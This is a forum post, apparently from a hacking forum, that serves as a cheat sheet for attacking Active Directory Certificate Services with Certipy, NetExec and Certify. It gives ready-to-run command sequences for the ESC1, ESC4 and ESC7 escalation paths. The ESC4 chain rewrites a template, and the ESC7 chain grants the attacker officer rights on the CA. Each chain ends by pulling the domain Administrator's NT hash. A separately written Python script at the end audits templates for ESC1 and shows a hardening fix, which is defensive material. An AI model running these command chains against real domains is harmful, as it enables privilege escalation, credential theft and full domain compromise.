
ADCS Attacks with Certipy

admin
#root
Administrator
Joined: 20.01.2011
Messages: 7,665
Giveaways: 0
Reactions: 135

NetExec

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

BASH

nxc ldap $IP -u $username -p $password -M adcs

Certipy

Search for vulnerable certificate templates

BASH

certipy find -u $username -p $password -dc-ip $IP -vulnerable -enabled

List CAs, servers and search for vulnerable certificate templates

BASH

certipy find -u $username -p $password -dc-ip $IP -dns-tcp -ns $IP -debug

Certify

Search for vulnerable certificate templates:

POWERSHELL

Certify.exe find /vulnerable

Attacks

ESC1

Create a new machine account

BASH

impacket-addcomputer $domain/$username:$password -computer-name $computer_name$ -computer-pass $computer_password

Use the ability to enroll as a normal user & provide a user-defined Subject Alternative Name (SAN)

BASH

certipy req -u $computer_name$ -p $computer_password -ca $ca -target $domain -template $template -upn $username@$domain -dns $domain -dc-ip $IP

Authenticate with the certificate and get the NT hash of the Administrator

BASH

certipy auth -pfx $pfx_file -domain $domain -username $username -dc-ip $IP

ESC4

Overwrite the configuration to make it vulnerable to ESC1

BASH

certipy template -username $username -password $password -template $template -save-old -dc-ip $IP

Now if you run this command, it should show that the certificate is vulnerable to ESC1

BASH

certipy find -u $username -p $password -dc-ip $IP -dns-tcp -ns $IP -stdout -debug

ESC7

In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. With the Manage CA access right, we can fulfill these prerequisites.
If you only have the Manage CA access right, you can grant yourself the Manage Certificates access right by adding your user as a new officer.

BASH

certipy ca -ca $ca -add-officer $username -username $username@$domain -password $password -dc-ip $IP -dns-tcp -ns $IP

Enable the SubCA template on the CA using the -enable-template parameter. By default, the SubCA template is enabled.

BASH

certipy ca -ca $ca -enable-template SubCA -username $username@$domain -password $password -dc-ip $IP -dns-tcp -ns $IP

This request will be denied, but we will save the private key and note down the request ID.

BASH

certipy req -username $username@$domain -password $password -ca $ca -target $IP -template SubCA -upn $username@$domain

With our Manage CA and Manage Certificates access rights, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.

BASH

certipy ca -ca $ca -issue-request $request_ID -username $username@$domain -password $password

And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.

BASH

certipy req -username $username@$domain -password $password -ca $ca -target $IP -retrieve $request_ID

Authenticate with the certificate and get the NT hash of the Administrator

BASH

certipy auth -pfx $pfx -domain $domain -username $username -dc-ip $IP

Resources

Tools
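The ESC1 and ESC4 sections above rely on a template that lets the requester supply the SAN, issues authentication-capable certificates, needs no approval, and is enrollable by ordinary domain members; `certipy find -vulnerable` flags exactly that combination. As an added defensive check (this is not code from the post, nor from Certipy, NetExec or Certify), the script below evaluates template attributes for those same conditions and shows the cheapest hardening step, so an AD CS admin can confirm a fix before and after changing a template. Templates are modelled as dicts keyed by the real LDAP attribute names (`msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage`); the keys `enabled` and `enroll_principals` are hypothetical stand-ins for the CA's published-template list and the resolved enrollment ACEs, and all sample template data is constructed.

```python
"""Audit AD CS certificate templates for the ESC1 misconfiguration.

Added stand-alone example; not code from the original post and not part of
Certipy or NetExec. Templates are dicts keyed by the LDAP attribute names AD CS
stores under CN=Certificate Templates,CN=Public Key Services,CN=Services,
CN=Configuration, plus two hypothetical keys, "enabled" and
"enroll_principals", standing in for the CA's published-template list and the
resolved enrollment ACEs. All template data below is constructed.
"""
from copy import deepcopy

# msPKI-Certificate-Name-Flag bit: the requester may put any subject/SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is held for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let the issued certificate authenticate to AD (PKINIT / Schannel)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}

# Principals whose enrollment right makes a template reachable by any domain member
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def permits_authentication(ekus):
    """An empty EKU list means 'any purpose', which includes client authentication."""
    return not ekus or any(oid in AUTH_EKUS for oid in ekus)


def esc1_findings(template):
    """Return the conditions that together make the template ESC1.
    An empty list means at least one condition is not met (no finding)."""
    if not template.get("enabled", True):
        return []
    if not template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []
    if not permits_authentication(template.get("pKIExtendedKeyUsage", [])):
        return []
    if template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        return []
    if template.get("msPKI-RA-Signature", 0) > 0:
        return []
    exposed = set(template.get("enroll_principals", [])) & LOW_PRIV_PRINCIPALS
    if not exposed:
        return []
    return [
        "requester supplies the subject/SAN (ENROLLEE_SUPPLIES_SUBJECT set)",
        "EKU permits domain authentication",
        "no CA manager approval (PEND_ALL_REQUESTS clear)",
        "no authorized signature required (msPKI-RA-Signature = 0)",
        "enrollment granted to " + ", ".join(sorted(exposed)),
    ]


def audit(templates):
    """Map template name -> ESC1 findings, only for templates that match."""
    result = {}
    for t in templates:
        findings = esc1_findings(t)
        if findings:
            result[t["name"]] = findings
    return result


def harden(template):
    """Copy of the template with the least disruptive fix: require manager approval.
    Clearing ENROLLEE_SUPPLIES_SUBJECT or removing the enrollment ACE also work
    but change what the template can be used for."""
    fixed = deepcopy(template)
    fixed["msPKI-Enrollment-Flag"] = fixed.get("msPKI-Enrollment-Flag", 0) | CT_FLAG_PEND_ALL_REQUESTS
    return fixed


# Constructed sample data: one template per outcome.
TEMPLATES = [
    {   # Default-style User template: subject is built from AD, not from the CSR
        "name": "User", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x29, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll_principals": ["Domain Users"],
    },
    {   # Web-server style: requester supplies the subject, but EKU is Server Auth only
        "name": "WebServer", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll_principals": ["Domain Computers"],
    },
    {   # The ESC1 pattern: supplied SAN + Client Auth + no approval + Domain Users enroll
        "name": "VulnUserAuth", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": ["Domain Users", "Domain Admins"],
    },
]

if __name__ == "__main__":
    for name, reasons in audit(TEMPLATES).items():
        print(f"[ESC1] {name}")
        for r in reasons:
            print("   -", r)
    print("after hardening:", audit([harden(t) for t in TEMPLATES]) or "no ESC1 templates")
```

Running it reports only `VulnUserAuth`: the `User` template fails the supplied-subject test and `WebServer` fails the authentication-EKU test, which is why neither is usable for the `-upn` trick shown under ESC1. The same function run after `harden()` returns nothing, and it is also the check to rerun after an ESC4-style template change, since `-save-old` only helps if someone notices the template was rewritten.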